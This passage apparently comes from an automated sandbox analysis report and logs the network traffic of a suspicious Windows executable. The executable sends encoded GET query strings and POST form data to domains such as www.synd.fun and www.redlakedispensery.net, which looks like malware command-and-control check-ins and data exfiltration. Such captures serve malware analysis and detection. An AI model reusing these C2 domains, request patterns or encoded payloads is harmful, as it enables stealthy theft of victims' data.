VzK4o8Jx=K5Wo6Mtmwgq1wIC9st4M6lqSdkco1TIvjAeFXj7seBjoKtQHOr8b9jIffL20s3UGbRRD1f70nyqBQBQJp8KkUKsUrGaBGmep+EAugnRG0f4kFqVPkIJv20m2Jo1BQ6N4nrrKjEVRDqsU3pWJlQel8OwXPdAvb0i0kpzcOhSaxCgN8bmp4QTFsV6/fkZlKAjwcRBs8xCXcd61N7nOLuIJ3F8k5mAgJr28t6kyAba2TtU+ysei4gAixgQK+ogSeGqHwMbCtdApGmW+KqfFPd6RAlFhE5CKeqYQg3TAEgUFVwxgYmvhaUAgWhED7B8gWlfICNgZqoAYAkkuhEmuZgf8CvuHCweqN5BJVA5t7fwpu0KbGmRKOTxpqEUVhe+J0LeVAdFYY/Al4qyCi2+U4uR8J/ycFYdKXsL3yAEh6wSde2oTmT1u3L0DjhgR/HHi4m6IIcmbgQ9PLI33rYk2c/NOvqLY+LwtJQCWDr0cTTB4o1GcCIjycEmzQ/fkqecy+7jGD0HISINLeI5VO/agRjQlU6+4g3yThGA8oW9E0mt/fEPSilBhDzOLdbBHelUK0o+hju8bKCGcO/ykOe0D3wBvzmu0v48/fOvRk48xn8MLx83j5BX/jU7LKLDHQHLpLeUUQ9W+0VmRQrlFJVCyKL2zxWrzkq9pIdnWp5fu+fGJqaNFuT+3M6+4uzHl1Ar0g02gJ6UFdxdtSaE+pJ3Dc8yOxUImOZNWtE4lxTCcDkAI2f6W/xpGzisLAV348vwz3b2dZJLgLaGGHe+vucbBXSwJVDpzevV62QaS86Y6sCcrW4LJe2gRLQlJX30hoZG6BGy2ngaoANKi
Oct 7, 2024 11:52:25.473268986 CEST	2492	OUT	Data Raw: 6a 39 62 37 54 38 76 53 32 73 39 6f 53 51 41 52 52 77 31 33 47 43 35 47 41 71 44 56 65 7a 61 63 6e 32 78 46 65 4f 45 78 42 4a 72 55 74 56 53 58 78 30 35 61 74 72 35 6b 4a 6e 74 66 6f 2f 36 61 59 53 77 62 7a 79 6e 47 68 66 42 48 5a 38 4c 36 79 47 Data Ascii: j9b7T8vS2s9oSQARRw13GC5GAqDVezacn2xFeOExBJrUtVSXx05atr5kJntfo/6aYSwbzynGhfBHZ8L6yGZ1KFnUrGxlPckvWEl/cqfEey+ds9Wwji84b399YQGfZxKduHLPzq01rqZSrvHqSdDHvsNjKQkMq8BZ824b6mVJi/oBvgT3sax4pq0jbQyFbik80UYeohFEygP6PkwAXE9OuHg4LnkbhQLz29wSJuCCqHjsRcBWgB9
Oct 7, 2024 11:52:25.708239079 CEST	1289	IN	Data Raw: 4e 38 6a 6b 93 e7 92 b4 7d 30 dc 00 31 d1 53 e8 f7 cf 88 74 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e a6 77 93 cf 75 48 a4 e2 ba 05 c2 4c f1 cc 11 6a 94 a7 b0 05 5a d8 50 32 1a 05 4a 27 77 93 d9 65 8c d3 ca de 1b 0e ec 48 7a 5f a0 86 fd 0d 32 90 fd 1d Data Ascii: N8jk}01St/"DNwuHLjZP2J'weHz_2&Irk>P$"E!`nC;:7P[`5HP6Lx<M?Nb"Dr[P" aL_P1@k}ZZP16Yxl\|[3&
Oct 7, 2024 11:52:25.708363056 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:52:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 [TRUNCATED] Data Ascii: e2cZmo_qdCKrtu-HI6+4hW`Can^@>\dq[}9<oGh6_F[#J^QF%QT$AFK0Nzr-"RtMGm Tr:QQQs<'rktUc]DN1.r0)FInIBrzYy\| AMU+68i]?s#[(v+\eG4d#WX._nVI=T@z#\-?8dXF0bGFfQ}f0i$<l;HFKwEk(2\K~r.Jt);G$R`x/~Em\|'ywow+uxAaxt&V;oo(hQ,.9soCf~rnf<tUz-o/,=?@FaQtm'Pr>\4znz;hL_m`T=\4(\|/_BJ~b&/B=e#zKA.yZ.!fqDuVwBk)Xp`(WPVlhbR7'$G)T]=s-ku2r%A&t^#bN}<\|%$7E\|?a\|OQ!bB!dV,&bH;9=S6]ve~H]>8 [TRUNCATED]
Oct 7, 2024 11:52:25.708410025 CEST	1236	IN	Data Raw: 5a b2 57 91 4f 71 aa 01 2f 29 6c 18 3d 80 2c d8 30 00 2d 73 4e 96 c7 08 ca 40 c0 d4 9f 40 d8 74 44 3a 6f d9 13 6b af bd 69 70 f2 92 67 94 68 8c 2e d2 35 37 6f 33 a5 5b 4e e9 d6 29 18 88 cf b9 9e 7a 58 97 6e 20 15 8e 1c 0f 79 68 37 b7 61 e1 70 6c Data Ascii: ZWOq/)l=,0-sN@@tD:okipgh.57o3[N)zXn yh7aplCwd$+z(\|QTn"pP~L5~d/M~6e h_?)G`\Ps(NFRl>?tz(9~\|I&Y]ysR^-WEg5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.30	49780	194.58.112.174	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:28.328273058 CEST	385	OUT	GET /pisq/?VzK4o8Jx=H7+I56BzzgTO14iYyfpq/0TXLnkw0DU3mxqOdQDMcBjOXdIUFfgl3gtbee+L6DVRaRQz5ZravCeTSBENiaLmUfkQqiezYkWa8l0+pkZP8o0fG616lfZJ+EU=&0zu8A=o2yln6 HTTP/1.1 Host: www.synd.fun Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:52:28.634067059 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:52:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 31 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 [TRUNCATED] Data Ascii: 2911<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.synd.fun</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" rel= [TRUNCATED]
Oct 7, 2024 11:52:28.634118080 CEST	1289	IN	Data Raw: 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f Data Ascii: _style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.synd.fun</h1><p class="b-parking__header-description b-text"> <br
Oct 7, 2024 11:52:28.634215117 CEST	1289	IN	Data Raw: 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61 64 65 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 20 62 2d 70 Data Ascii: rall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-t
Oct 7, 2024 11:52:28.634318113 CEST	1289	IN	Data Raw: 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e d0 98 d1 81 d0 bf d0 be d0 bb d1 8c d0 b7 d1 83 d0 b9 d1 82 d0 b5 20 d0 93 d0 be d1 82 d0 Data Ascii: rong><p class="b-text b-parking__promo-description">  CMS
Oct 7, 2024 11:52:28.634376049 CEST	1289	IN	Data Raw: 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 73 79 6e 64 2e 66 75 Data Ascii: ing__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-
Oct 7, 2024 11:52:28.634390116 CEST	1289	IN	Data Raw: 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 Data Ascii: class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_none">SSL-
Oct 7, 2024 11:52:28.634402037 CEST	1289	IN	Data Raw: 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 Data Ascii: .trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; } if ( data.ref_id ) {
Oct 7, 2024 11:52:28.634413958 CEST	1289	IN	Data Raw: 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2e 6d 61 74 63 68 28 20 2f 28 78 6e 2d 2d 7c 5b 30 2d 39 5d 29 2e 2b 5c 2e 28 78 6e 2d 2d 29 5b 5e 5c 73 5d 2b 2f 20 29 5b 30 5d 3b 0a 0a 20 20 20 20 20 Data Ascii: var domainName = document.title.match( /(xn--\|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUnicode = punycode.ToUnicode( domainName ); document.title = document.title.replace( domainName, do
Oct 7, 2024 11:52:28.634430885 CEST	364	IN	Data Raw: 69 70 74 22 2c 20 22 68 74 74 70 73 3a 2f 2f 6d 63 2e 79 61 6e 64 65 78 2e 72 75 2f 6d 65 74 72 69 6b 61 2f 74 61 67 2e 6a 73 22 2c 20 22 79 6d 22 29 3b 0a 0a 20 20 20 20 79 6d 28 35 34 32 30 30 39 31 34 2c 20 22 69 6e 69 74 22 2c 20 7b 0a 20 20 Data Ascii: ipt", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div><img src="https://mc.yandex.ru/watch/5420091

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.30	49781	217.70.184.50	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:34.116538048 CEST	683	OUT	POST /phw5/ HTTP/1.1 Host: www.redlakedispensery.net Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.redlakedispensery.net Referer: http://www.redlakedispensery.net/phw5/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 35 6c 67 71 6b 41 4b 44 50 70 57 34 62 35 4d 42 35 78 61 42 48 37 4d 45 69 4f 69 5a 4e 6d 76 7a 48 4f 44 38 6e 4d 76 48 46 4a 31 5a 5a 35 66 53 76 32 52 41 39 58 75 44 77 5a 74 67 4d 4e 51 56 49 70 54 6e 70 77 52 38 70 41 38 37 74 73 41 4e 4b 47 6a 66 66 6d 4e 4b 62 62 41 4f 31 61 6c 38 38 45 54 53 56 6a 63 49 62 4e 4b 76 4e 66 46 6f 49 76 62 6b 4c 4f 43 36 57 52 76 6c 65 47 2f 36 36 5a 7a 59 75 4b 5a 79 34 71 68 52 4b 79 79 5a 77 68 4e 70 6d 58 2f 79 6c 66 75 35 65 48 4a 4b 62 6a 64 62 49 59 56 44 69 77 58 4e 5a 53 6d 66 6f 37 71 54 70 66 53 31 67 45 6c 53 38 77 7a 49 51 77 3d 3d Data Ascii: VzK4o8Jx=5lgqkAKDPpW4b5MB5xaBH7MEiOiZNmvzHOD8nMvHFJ1ZZ5fSv2RA9XuDwZtgMNQVIpTnpwR8pA87tsANKGjffmNKbbAO1al88ETSVjcIbNKvNfFoIvbkLOC6WRvleG/66ZzYuKZy4qhRKyyZwhNpmX/ylfu5eHJKbjdbIYVDiwXNZSmfo7qTpfS1gElS8wzIQw==
Oct 7, 2024 11:52:34.283698082 CEST	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Mon, 07 Oct 2024 09:52:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.30	49782	217.70.184.50	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:36.847074032 CEST	703	OUT	POST /phw5/ HTTP/1.1 Host: www.redlakedispensery.net Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.redlakedispensery.net Referer: http://www.redlakedispensery.net/phw5/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 35 6c 67 71 6b 41 4b 44 50 70 57 34 61 59 38 42 37 51 61 42 51 72 4d 48 68 4f 69 5a 55 32 76 33 48 4f 48 38 6e 4e 71 4b 46 37 68 5a 5a 63 7a 53 75 79 6c 41 2b 58 75 44 6f 4a 74 6c 52 39 51 4b 49 70 65 61 70 30 56 38 70 41 6f 37 74 75 6f 4e 66 6e 6a 63 65 32 4e 55 43 72 41 49 6f 71 6c 38 38 45 54 53 56 6a 49 69 62 4e 53 76 4e 76 56 6f 4a 4f 62 6c 58 65 43 39 65 78 76 6c 61 47 2f 2b 36 5a 79 39 75 4f 5a 59 34 75 52 52 4b 79 43 5a 78 31 5a 71 76 58 2f 38 76 2f 76 55 62 45 39 42 66 7a 35 30 41 59 56 51 6f 44 7a 4a 63 46 58 46 31 34 65 52 36 2f 75 59 38 46 49 36 2b 79 79 54 4e 37 64 71 64 34 65 39 4a 74 64 30 42 30 4d 6a 63 6e 36 6c 6d 58 30 3d Data Ascii: VzK4o8Jx=5lgqkAKDPpW4aY8B7QaBQrMHhOiZU2v3HOH8nNqKF7hZZczSuylA+XuDoJtlR9QKIpeap0V8pAo7tuoNfnjce2NUCrAIoql88ETSVjIibNSvNvVoJOblXeC9exvlaG/+6Zy9uOZY4uRRKyCZx1ZqvX/8v/vUbE9Bfz50AYVQoDzJcFXF14eR6/uY8FI6+yyTN7dqd4e9Jtd0B0Mjcn6lmX0=
Oct 7, 2024 11:52:37.020891905 CEST	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Mon, 07 Oct 2024 09:52:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.30	49783	217.70.184.50	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:39.554495096 CEST	2578	OUT	POST /phw5/ HTTP/1.1 Host: www.redlakedispensery.net Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.redlakedispensery.net Referer: http://www.redlakedispensery.net/phw5/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 35 6c 67 71 6b 41 4b 44 50 70 57 34 61 59 38 42 37 51 61 42 51 72 4d 48 68 4f 69 5a 55 32 76 33 48 4f 48 38 6e 4e 71 4b 46 37 5a 5a 5a 75 37 53 76 56 35 41 2f 58 75 44 68 70 74 6b 52 39 51 44 49 70 48 52 70 78 4e 47 70 47 73 37 2f 2f 49 4e 62 6c 4c 63 51 32 4e 55 4b 4c 41 4e 31 61 6c 54 38 45 6a 57 56 6a 59 69 62 4e 53 76 4e 70 5a 6f 41 2f 62 6c 56 65 43 36 57 52 76 78 65 47 2f 47 36 5a 37 41 75 4f 56 69 34 72 46 52 4b 41 36 5a 77 41 4e 71 76 58 2f 38 31 50 76 56 62 45 68 43 66 7a 77 74 41 61 31 71 6f 31 50 4a 65 52 32 6d 6d 35 61 37 6d 35 36 73 33 6d 6b 54 70 53 75 62 4c 35 35 5a 56 4c 37 48 44 39 41 64 4f 41 51 45 5a 31 62 68 79 51 42 6d 4e 61 53 34 4f 31 44 38 51 4b 65 2b 36 36 44 74 50 50 6e 6a 6a 33 77 48 50 52 55 49 38 64 53 39 31 68 78 77 6f 52 33 57 31 63 73 57 43 61 61 6d 71 6b 61 66 55 4e 78 6e 67 53 5a 58 54 73 4c 50 65 4b 57 31 58 78 4c 6e 50 6a 6d 77 35 4b 74 62 30 55 5a 31 54 6a 6f 35 51 51 32 56 72 4d 39 47 41 49 32 4d 61 4c 57 33 79 4c 34 66 7a 2f 32 65 63 [TRUNCATED] Data Ascii: VzK4o8Jx=5lgqkAKDPpW4aY8B7QaBQrMHhOiZU2v3HOH8nNqKF7ZZZu7SvV5A/XuDhptkR9QDIpHRpxNGpGs7//INblLcQ2NUKLAN1alT8EjWVjYibNSvNpZoA/blVeC6WRvxeG/G6Z7AuOVi4rFRKA6ZwANqvX/81PvVbEhCfzwtAa1qo1PJeR2mm5a7m56s3mkTpSubL55ZVL7HD9AdOAQEZ1bhyQBmNaS4O1D8QKe+66DtPPnjj3wHPRUI8dS91hxwoR3W1csWCaamqkafUNxngSZXTsLPeKW1XxLnPjmw5Ktb0UZ1Tjo5QQ2VrM9GAI2MaLW3yL4fz/2eco+R46JchfSIjspx1DHPtgQy6Cq+t/2Wh1GEG7UDwxC/4hKuwL+k+zwyZ6Uzuxw6Z5wruU+9iI/GqMcCnXCIa5dGbdSkkt42+3kvluqmE4MdSGkSSUtCzf1A0/dkxurUG+TCk8IeVJI9/3QNLY8cXgITxlqq0ZO0HVsN/pl8ts7sDLVsG9YQ1uECGYk5wywciAB8n1OpS4wnb0CWClqFxmAt7h/Dm9HT2XYEZeHH+PoClmbPx7TKzRVfXwjkh7FONBDOB8e1iOJXRLTw44IQADsfux5y5/iTnXiLnoeVixe899WJV0uIru25gx7FX7F05BuFHTRrk0DMs5g5ToQXIM8crpxrhami89Ap4YBmgN6ycM5S/AAY66al3x2fxUr2tWeGqX6LhmUTIM8eY9a0CzrEQskDQF8RNVPMoCNHHvDoTN/FyOUia6+gJxcNCX2ZDuk6s6pqGDk1rk1ObEZzTqqrJSrd6s+fn3kKwS+kvJYQgsv2Zl8tWHNI+5Ya/ED8UzTee97sgRo7u89j/B+fP+0ka3Dmj+rSySIHiqAFsJYGtZHtF6UK5h7x/GhpzkFEzhSiZzFgPgnzs5/4IbcVXPHN7NdXIJ1Pe+OPwJC9AyojPPpelq5YndTDk/4TOQ9EDPSdvUXFRjhVvMvxaX3J5alA4+FS/sAfyfW [TRUNCATED]
Oct 7, 2024 11:52:39.554550886 CEST	1242	OUT	Data Raw: 6d 56 79 67 41 43 32 41 67 31 43 38 57 79 30 57 66 6f 52 6c 70 7a 47 4d 4c 4a 65 4e 4c 45 4e 67 57 46 44 4f 4a 59 70 4f 6c 6d 77 30 50 76 2b 2b 6f 4b 65 74 37 58 76 4c 58 2f 6e 6d 30 77 69 65 48 51 54 37 70 4f 71 63 58 65 51 6e 30 6b 45 6f 4d 69 Data Ascii: mVygAC2Ag1C8Wy0WfoRlpzGMLJeNLENgWFDOJYpOlmw0Pv++oKet7XvLX/nm0wieHQT7pOqcXeQn0kEoMiUYPCHCEXUTzZpBNLNmB3GDQUk4hTgzJ1EMzERcfEt7vOnKcxjW24LWsXYYwNN0zIZT2TSyoyAZvronXMR2EW2zoE1nHm7s/QKECudadKaI7i0qRNiZ9eKuGu6XeH+ItoMWZeuJKOxdREiwp0VcsFRPZBxbWWt8dC1
